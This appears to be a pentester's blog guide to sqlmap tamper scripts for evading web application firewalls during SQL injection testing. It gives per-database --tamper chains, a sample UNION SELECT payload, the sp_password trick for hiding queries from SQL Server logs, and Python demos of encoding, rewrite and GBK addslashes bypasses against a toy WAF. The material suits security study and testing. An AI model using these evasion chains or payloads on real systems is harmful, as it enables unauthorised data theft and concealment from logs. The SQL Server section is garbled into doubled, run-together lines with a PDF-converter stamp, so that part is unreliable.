sqlmap-tamper-scripts: sqlmap tamper scripts explained in detail
Using sqlmap tamper scripts during a pentest can be a bit confusing, and it is a lot of work to figure out which scripts you need to use and when to use them. I have an upcoming pentest I need to perform and figured this is the perfect time to organize all of this.

First of all, not all scripts are created equal. Some work for general run-of-the-mill SQL injection attacks and others are for specific databases. For some it is not actually certain whether they work on all databases, and some have only been officially tested against older versions of the database software. This is the very definition of hit and miss.

I reviewed each tamper script and tried to place them in boxes. If you have feedback on any of these boxes PLEASE don't be shy! Let me know in the comment section. I want this to be a good resource and your help would be greatly appreciated.

The General Scripts section contains both database-agnostic scripts and those that cover a wide range of databases. In my opinion, this would be a good starting box of scripts to use as an initial hit on an application. Again, feedback appreciated.

I am going to include the syntax to run each section as well as one to run every script. sqlmap will order chained scripts automatically, by each script's priority value. However, I captured traffic from running all scripts and it didn't look familiar at all. I'm not sure if it is a good idea to do this or not. Feedback welcome!
Jump to
general
Microsoft-Access
mssql
mysql
oracle
postgresql
sap
sqlite

All scripts:
--tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

General Scripts
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
apostrophemask
Replaces the apostrophe character with its UTF-8 full-width counterpart (%EF%BC%87, U+FF07). This only works where something between the web server and the DBMS (for example a best-fit charset conversion) maps the full-width character back to a plain apostrophe; to the SQL parser itself it is just another character.

apostrophenullencode
Replaces the apostrophe character with its illegal double-unicode counterpart (%00%27)
Apr 11 2015
base64encode
Base64-encodes all characters in a given payload. This is not a WAF bypass on its own: the payload only becomes SQL again if the application base64-decodes the parameter before building the query.

between
Replaces the greater-than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces the equals operator ('=') with 'BETWEEN # AND #'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater-than character
* The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases
* 'a > b' and 'a NOT BETWEEN 0 AND b' only agree when a is not negative; sqlmap's blind probes compare ASCII codes and lengths, so this holds in practice

chardoubleencode
Double URL-encodes all characters in a given payload (not processing already encoded ones)
Notes:
* Useful to bypass some weak web application firewalls that do not double URL-decode the request before processing it through their ruleset. It only works when the server side does decode twice; otherwise the application receives literal %XX sequences instead of SQL.

charencode
URL-encodes all characters in a given payload (not processing already encoded ones)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not URL-decode the request before processing it through their ruleset
* The web server will pass the URL-decoded version on anyway, hence it should work against any DBMS

charunicodeencode
Unicode-URL-encodes non-encoded characters in a given payload (the %uXXXX form, not processing already encoded ones). The ASP/ASP.NET requirement exists because IIS decodes %uXXXX; other web servers leave it as-is.
Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
* Useful to bypass weak web application firewalls that do not Unicode-URL-decode the request before processing it through their ruleset
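The three encoding scripts above (charencode, chardoubleencode, charunicodeencode) all rely on the same thing: the WAF inspecting the request decodes it fewer times, or differently, than the web server does. The following is an added example written for this page, not sqlmap's own code, that reproduces each transformation and runs the result past a constructed toy WAF whose only rule is a UNION...SELECT regex applied after a configurable number of decoding passes. The payload, the rule and the WAF are all constructed for the demonstration.

```python
"""Added example (my own code, not sqlmap's): what charencode, chardoubleencode
and charunicodeencode do to a payload, and which kind of WAF still catches each.

`waf_blocks` is a constructed stand-in for a WAF: one keyword rule applied after
a configurable number of URL-decoding rounds. PAYLOAD is a constructed sample."""
import re
from urllib.parse import unquote

PAYLOAD = "1' UNION SELECT user,password FROM users-- "  # constructed sample

# The only rule our toy WAF has: UNION ... SELECT, case-insensitive.
KEYWORD_RE = re.compile(r"(?i)\bunion\b.*\bselect\b")


def charencode(payload: str) -> str:
    """%XX-encode every character (what sqlmap's charencode does)."""
    return "".join("%%%02X" % ord(c) for c in payload)


def chardoubleencode(payload: str) -> str:
    """Encode twice: every '%' of the first pass becomes '%25'."""
    return charencode(charencode(payload))


def charunicodeencode(payload: str) -> str:
    """IIS-style %uXXXX encoding (sqlmap's charunicodeencode); ASP/ASP.NET decode it."""
    return "".join("%%u%04X" % ord(c) for c in payload)


def url_decode_rounds(s: str, rounds: int) -> str:
    """Apply standard %XX decoding `rounds` times; %uXXXX is left untouched."""
    for _ in range(rounds):
        s = unquote(s)
    return s


def iis_unicode_decode(s: str) -> str:
    """Emulate IIS: %uXXXX -> the code point (urllib does not know this form)."""
    return re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), s)


def waf_blocks(param: str, decode_rounds: int, iis_aware: bool = False) -> bool:
    """Constructed WAF: normalise, then match the rule on what it ends up seeing."""
    view = iis_unicode_decode(param) if iis_aware else param
    view = url_decode_rounds(view, decode_rounds)
    return KEYWORD_RE.search(view) is not None


def outcomes() -> dict:
    """Which variant each kind of WAF still catches (True = blocked)."""
    variants = {
        "plain": PAYLOAD,
        "charencode": charencode(PAYLOAD),
        "chardoubleencode": chardoubleencode(PAYLOAD),
        "charunicodeencode": charunicodeencode(PAYLOAD),
    }
    return {
        "no_decode": {k: waf_blocks(v, 0) for k, v in variants.items()},
        "decode_once": {k: waf_blocks(v, 1) for k, v in variants.items()},
        "decode_twice": {k: waf_blocks(v, 2) for k, v in variants.items()},
        "iis_aware": {k: waf_blocks(v, 1, iis_aware=True) for k, v in variants.items()},
    }


if __name__ == "__main__":
    for waf, seen in outcomes().items():
        print(waf, {k: ("blocked" if v else "passed") for k, v in seen.items()})
```

The table the script prints is the whole point: charencode only gets past a WAF that never decodes, chardoubleencode only past one that decodes once while the server decodes twice, and charunicodeencode only past one that does not understand the IIS %u form. A WAF that normalises exactly like the target server catches all three, which is why these scripts are listed as working against "very weak" firewalls.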
equaltolike
Replaces all occurrences of the equals operator ('=') with the operator 'LIKE'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases
* LIKE treats '%' and '_' in its right-hand operand as wildcards, so a comparison involving data that contains them can change its result

greatest
Replaces the greater-than operator ('>') with its 'GREATEST' counterpart ('a > b' becomes 'GREATEST(a,b+1)=a')
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater-than character (note that the rewrite still contains '=')
* The GREATEST function is widespread but not universal (SQLite uses MAX() instead and Microsoft SQL Server only gained it in SQL Server 2022). Hence, this tamper script should work against the majority of databases
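between, equaltolike and greatest all rewrite a comparison into an equivalent one that avoids a filtered character, and each has an edge case where the rewritten comparison is no longer equivalent. The following added example, my own simplified re-implementation rather than sqlmap's actual regexes, applies the three rewrites to a few constructed comparisons and checks two things: whether a constructed bespoke filter that rejects '>' and '=' still fires, and whether the rewritten expression keeps the original truth value when SQLite evaluates both (GREATEST is supplied from Python because SQLite does not have it). The samples and the filter are constructed for the demonstration.

```python
"""Added example (my own simplified re-implementation, not sqlmap's regexes) of
the between, equaltolike and greatest rewrites, checked against a constructed
filter that rejects '>' and '=' and against SQLite for truth preservation."""
import re
import sqlite3

# `<left> <op> <right>` where right is an integer literal or a quoted string
_CMP = re.compile(r"(\S+)\s*(>|=)\s*(\d+|'[^']*')")


def between(payload: str) -> str:
    """a > b -> a NOT BETWEEN 0 AND b  (only equivalent when a >= 0, which holds
    for sqlmap's ASCII()/LENGTH() probes);  a = b -> a BETWEEN b AND b."""
    def repl(m):
        left, op, right = m.groups()
        if op == ">":
            return f"{left} NOT BETWEEN 0 AND {right}"
        return f"{left} BETWEEN {right} AND {right}"
    return _CMP.sub(repl, payload)


def equaltolike(payload: str) -> str:
    """a = b -> a LIKE b. Equivalent unless b contains the wildcards % or _."""
    return re.sub(r"\s*=\s*", " LIKE ", payload)


def greatest(payload: str) -> str:
    """a > b -> GREATEST(a,b+1)=a for integer b; removes '>' but introduces '='."""
    def repl(m):
        left, op, right = m.groups()
        if op == ">" and right.isdigit():
            return f"GREATEST({left},{right}+1)={left}"
        return m.group(0)
    return _CMP.sub(repl, payload)


def bespoke_filter_blocks(s: str) -> bool:
    """Constructed stand-in for a custom filter that rejects '>' and '='."""
    return ">" in s or "=" in s


def sql_truth(conn: sqlite3.Connection, expr: str) -> bool:
    return bool(conn.execute(f"SELECT ({expr})").fetchone()[0])


SAMPLES = (  # constructed comparisons that SQLite can evaluate
    "LENGTH('abc') > 2",
    "LENGTH('admin') > 7",
    "'admin' = 'admin'",
    "'5' = '5%'",   # equaltolike changes the answer: '%' is a LIKE wildcard
    "(-1) > 5",     # between changes the answer: left-hand side is negative
)


def demo() -> dict:
    conn = sqlite3.connect(":memory:")
    conn.create_function("GREATEST", 2, max)  # stand-in for MySQL/Oracle/PostgreSQL GREATEST()
    results = {}
    for expr in SAMPLES:
        for name, fn in (("between", between), ("equaltolike", equaltolike), ("greatest", greatest)):
            tampered = fn(expr)
            results[(expr, name)] = {
                "tampered": tampered,
                "blocked_before": bespoke_filter_blocks(expr),
                "blocked_after": bespoke_filter_blocks(tampered),
                "same_truth": sql_truth(conn, expr) == sql_truth(conn, tampered),
            }
    return results


if __name__ == "__main__":
    for (expr, name), r in demo().items():
        print(f"{name:12} {expr!r:24} -> {r['tampered']!r:48} "
              f"filter={'blocked' if r['blocked_after'] else 'passed'} "
              f"truth={'same' if r['same_truth'] else 'CHANGED'}")
```

Two rows in the output are the ones to remember: '(-1) > 5' becomes true after the between rewrite, and "'5' = '5%'" becomes true after equaltolike. Neither matters for sqlmap's own character-by-character probes, but it does if you hand-craft a payload and chain these scripts onto it.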
ifnull2ifisnull
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function

multiplespaces
Adds multiple spaces around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

nonrecursivereplacement
Replaces predefined SQL keywords with representations suitable for defeating single-pass replacement filters (e.g. .replace("SELECT", "")): SELECT becomes something like SELSELECTECT, which the filter collapses back into SELECT
Notes:
* Useful to bypass very weak custom filters

randomcase
Replaces each keyword character with a random-case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions (case-sensitive keyword matches)
* This tamper script should work against all (?) databases, since SQL keywords are case-insensitive

securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163

space2comment
Replaces the space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls

space2plus
Replaces the space character (' ') with plus ('+')
Notes:
* Is this of any use? The plus gets URL-encoded by the sqlmap engine, invalidating the query afterwards
* This tamper script works against all databases

space2randomblank
Replaces the space character (' ') with a random blank character from a valid set of alternate characters (%09, %0A, %0C, %0D)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
unionalltounion
Replaces UNION ALL SELECT with UNION SELECT

unmagicquotes
Replaces the quote character (') with the multi-byte combo %bf%27, together with a generic comment at the end (to make it work)
Notes:
* Useful for bypassing the magic_quotes/addslashes feature
* It only works when the application escapes quotes with a backslash but the database connection uses a multi-byte charset such as GBK: escaping turns %bf%27 into %bf%5c%27, the DBMS reads %bf%5c as one two-byte character, and the quote that follows is left unescaped. Under UTF-8 the backslash survives and nothing is gained.
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
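The mechanism behind unmagicquotes is easy to get wrong in one's head, so here it is as an added example written for this page (not sqlmap's or the referenced post's code): a byte-for-byte re-implementation of PHP's addslashes() as a constructed stand-in, the %bf%27 substitution sqlmap makes, and the decoding step a DBMS on a GBK connection would perform. The payload is a constructed sample; the check shows the quote surviving under GBK and not under UTF-8.

```python
"""Added example (my own code, not sqlmap's): why the %bf%27 trick of
unmagicquotes defeats addslashes()/magic_quotes on a GBK database connection
and does nothing on a UTF-8 one. addslashes() is a constructed byte-wise port
of the PHP function; the payload is a constructed sample."""
from urllib.parse import unquote_to_bytes


def addslashes(data: bytes) -> bytes:
    """Byte-wise port of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def unmagicquotes(payload: str) -> str:
    """First quote becomes %bf%27; a trailing comment is added unless one exists
    (the same shape of output sqlmap's script produces)."""
    tampered = payload.replace("'", "%bf%27", 1)
    if tampered != payload and not any(c in tampered for c in ("#", "--", "/*")):
        tampered += "-- -"
    return tampered


def as_seen_by_dbms(url_param: str, charset: str) -> str:
    """Web server URL-decodes, PHP addslashes() escapes, DBMS decodes with `charset`."""
    raw = unquote_to_bytes(url_param)
    escaped = addslashes(raw)
    return escaped.decode(charset, errors="replace")


def quote_survives(url_param: str, charset: str) -> bool:
    """True when an unescaped quote reaches the SQL parser."""
    text = as_seen_by_dbms(url_param, charset)
    return "'" in text and "\\'" not in text


if __name__ == "__main__":
    tampered = unmagicquotes("1' AND 1=1")
    for cs in ("gbk", "utf-8"):
        print(cs, repr(as_seen_by_dbms(tampered, cs)), "quote survives:", quote_survives(tampered, cs))
```

Under GBK the escaped bytes %bf%5c form one valid two-byte character, so the backslash is absorbed and the following quote terminates the string literal. The fix on the defending side is the one the reference describes: escape with a function that knows the connection charset (mysql_real_escape_string, or better, parameterised queries), and set the charset on the connection rather than with a bare SET NAMES.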
xforwardedfor
Appends a fake HTTP header 'X-Forwarded-For' (sqlmap fills it with a random source address on every request) to bypass WAF (usually application based) protection. This only helps when the protection keys on the client address and trusts that header.
Microsoft Access
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
(Note: the list as published omits appendnullbyte, the only script described below that actually requires Access, and includes several MySQL-only scripts; check it against the descriptions before use.)

appendnullbyte
Appends an encoded NULL byte character (%00) at the end of the payload
Requirement:
* Microsoft Access
Notes:
* Useful to bypass weak web application firewalls when the back-end database management system is Microsoft Access; further uses are also possible

equaltolike
Replaces all occurrences of the equals operator ('=') with the operator 'LIKE'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases
greatest
Replaces the greater-than operator ('>') with its 'GREATEST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater-than character
* The GREATEST function is widespread but not universal. Hence, this tamper script should work against the majority of databases

multiplespaces
Adds multiple spaces around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

nonrecursivereplacement
Replaces predefined SQL keywords with representations suitable for defeating single-pass replacement filters (e.g. .replace("SELECT", ""))
Notes:
* Useful to bypass very weak custom filters

randomcase
Replaces each keyword character with a random-case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
* This tamper script should work against all (?) databases

securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2comment
Replaces the space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls

space2plus
Replaces the space character (' ') with plus ('+')
Notes:
* Is this of any use? The plus gets URL-encoded by the sqlmap engine, invalidating the query afterwards
* This tamper script works against all databases

unionalltounion
Replaces UNION ALL SELECT with UNION SELECT

unmagicquotes
Replaces the quote character (') with the multi-byte combo %bf%27, together with a generic comment at the end (to make it work)
Notes:
* Useful for bypassing the magic_quotes/addslashes feature (requires a multi-byte connection charset such as GBK on the database side)
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

xforwardedfor
Appends a fake HTTP header 'X-Forwarded-For' to bypass WAF (usually application based) protection

Microsoft SQL Server
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

between
Replaces the greater-than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces the equals operator ('=') with 'BETWEEN # AND #'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater-than character
* The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases
charencode
URL-encodes all characters in a given payload (not processing already encoded ones)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not URL-decode the request before processing it through their ruleset
* The web server will pass the URL-decoded version on anyway, hence it should work against any DBMS

charunicodeencode
Unicode-URL-encodes non-encoded characters in a given payload (the %uXXXX form, not processing already encoded ones)
Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
* Useful to bypass weak web application firewalls that do not Unicode-URL-decode the request before processing it through their ruleset

equaltolike
Replaces all occurrences of the equals operator ('=') with the operator 'LIKE'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases
greatest
Replaces the greater-than operator ('>') with its 'GREATEST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater-than character
* The GREATEST function is widespread but not universal (Microsoft SQL Server only gained it in SQL Server 2022, so it is out of place in this box for older versions). Hence, this tamper script should work against the majority of databases

multiplespaces
Adds multiple spaces around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt

nonrecursivereplacement
Replaces predefined SQL keywords with representations suitable for defeating single-pass replacement filters (e.g. .replace("SELECT", ""))
Notes:
* Useful to bypass very weak custom filters

percentage
Adds a percentage sign ('%') in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
* Relies on the ASP request parser discarding a '%' that is not followed by two hex digits; other platforms pass the '%' through and the query breaks, which is why ASP is a requirement

randomcase
Replaces each keyword character with a random-case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written, permissive regular expressions
* This tamper script should work against all (?) databases
securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163

sp_password
Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
Requirement:
* MSSQL
Notes:
* Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure: SQL Server trace/Profiler replaces the text of any batch containing 'sp_password' with a comment saying the text was removed for security reasons
* Reference: http://websec.ca/kb/sql_injection

space2comment
Replaces the space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls

space2dash
Replaces the space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
Requirement:
* MSSQL
* SQLite
Notes:
* Useful to bypass several web application firewalls
* Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/

space2mssqlblank
Replaces the space character (' ') with a random blank character from a valid set of alternate characters (control characters in the %01 to %0F range, which SQL Server treats as whitespace)
Requirement:
* Microsoft SQL Server
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
Notes:
* Useful to bypass several web application firewalls
space2space2mysqlmysqldashdash
Replaces space character (‘ ‘) with a dash comment (‘–’) followed byReplaces space character (‘ ‘) with a dash comment (‘–’) followed by
a new line (‘\n’)a new line (‘\n’)
Requirement:Requirement:
* MySQL* MySQL
* MSSQL* MSSQL
Tested against:Tested against:
Notes:Notes:
* Useful to bypass several web application firewalls.* Useful to bypass several web application firewalls.
space2plusspace2plus
Replaces space character (‘ ‘) with plus (‘+’)Replaces space character (‘ ‘) with plus (‘+’)
Notes:Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwardsinvalidating the query afterwards
* This tamper script works against all databases* This tamper script works against all databases
space2randomblankspace2randomblank
Replaces space character (‘ ‘) with a random blank character from aReplaces space character (‘ ‘) with a random blank character from a
valid set of alternate charactersvalid set of alternate characters
Tested against:Tested against:
* Microsoft SQL Server 2005* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5* MySQL 4, 5.0 and 5.5
* Oracle 10g* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0* PostgreSQL 8.3, 8.4, 9.0
Notes:Notes:
* Useful to bypass several web application firewalls* Useful to bypass several web application firewalls
unionalltounionunionalltounion
Replaces UNION ALL SELECT with UNION SELECTReplaces UNION ALL SELECT with UNION SELECT
unmagicquotesunmagicquotes
Replaces quote character (‘) with a multi-byte combo %bf%27 together withReplaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)generic comment at the end (to make it work)
Notes:Notes:
* Useful for bypassing magic_quotes/addslashes feature* Useful for bypassing magic_quotes/addslashes feature
Reference:Reference:
** http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
converted by Web2PDFConvert.com
xforwardedforxforwardedfor
Append a fake HTTP header ‘X-Forwarded-For’ to bypassAppend a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protectionWAF (usually application based) protection
MySQL
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
between
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #'
Replaces equals operator ('=') with 'BETWEEN # AND #'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater than character
* The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases
bluecoat
Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character = with LIKE operator
Requirement:
* Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
* MySQL 5.1, SGOS
Notes:
* Useful to bypass Blue Coat's recommended WAF rule configuration
charencode
URL-encodes all characters in a given payload (not processing already encoded)
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset
* The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS
charunicodeencode
Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)
Requirement:
* ASP
* ASP.NET
Tested against:
* Microsoft SQL Server 2000
* Microsoft SQL Server 2005
* MySQL 5.1.56
* PostgreSQL 9.0.3
Notes:
* Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset
concat2concatws
Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that filter the CONCAT() function
equaltolike
Replaces all occurrences of operator equal ('=') with operator 'LIKE'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=')
* The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases
greatest
Replaces greater than operator ('>') with 'GREATEST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that filter the greater than character
* The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against the majority of databases
halfversionedmorekeywords
Adds versioned MySQL comment before each keyword
Requirement:
* MySQL < 5.1
Tested against:
* MySQL 4.0.18, 5.0.22
Notes:
* Useful to bypass several web application firewalls when the back-end database management system is MySQL
* Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
ifnull2ifisnull
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'
Requirement:
* MySQL
* SQLite (possibly)
* SAP MaxDB (possibly)
Tested against:
* MySQL 5.0 and 5.5
Notes:
* Useful to bypass very weak and bespoke web application firewalls that filter the IFNULL() function
modsecurityversioned
Encloses the complete query in a versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass ModSecurity WAF/IDS
modsecurityzeroversioned
Encloses the complete query in a zero-versioned comment
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass ModSecurity WAF/IDS
multiplespaces
Adds multiple spaces around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written permissive regular expressions
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
nonrecursivereplacement
Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters
Notes:
* Useful to bypass very weak custom filters
percentage
Adds a percentage sign ('%') in front of each character
Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
randomcase
Replaces each keyword character with random case value
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls that have poorly written permissive regular expressions
* This tamper script should work against all (?) databases
securesphere
Appends a specially crafted string
Notes:
* Useful for bypassing Imperva SecureSphere WAF
* Reference: http://seclists.org/fulldisclosure/2011/May/163
space2comment
Replaces space character (' ') with comments '/**/'
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
space2hash
Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
Requirement:
* MySQL
Tested against:
* MySQL 4.0, 5.0
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html
space2morehash
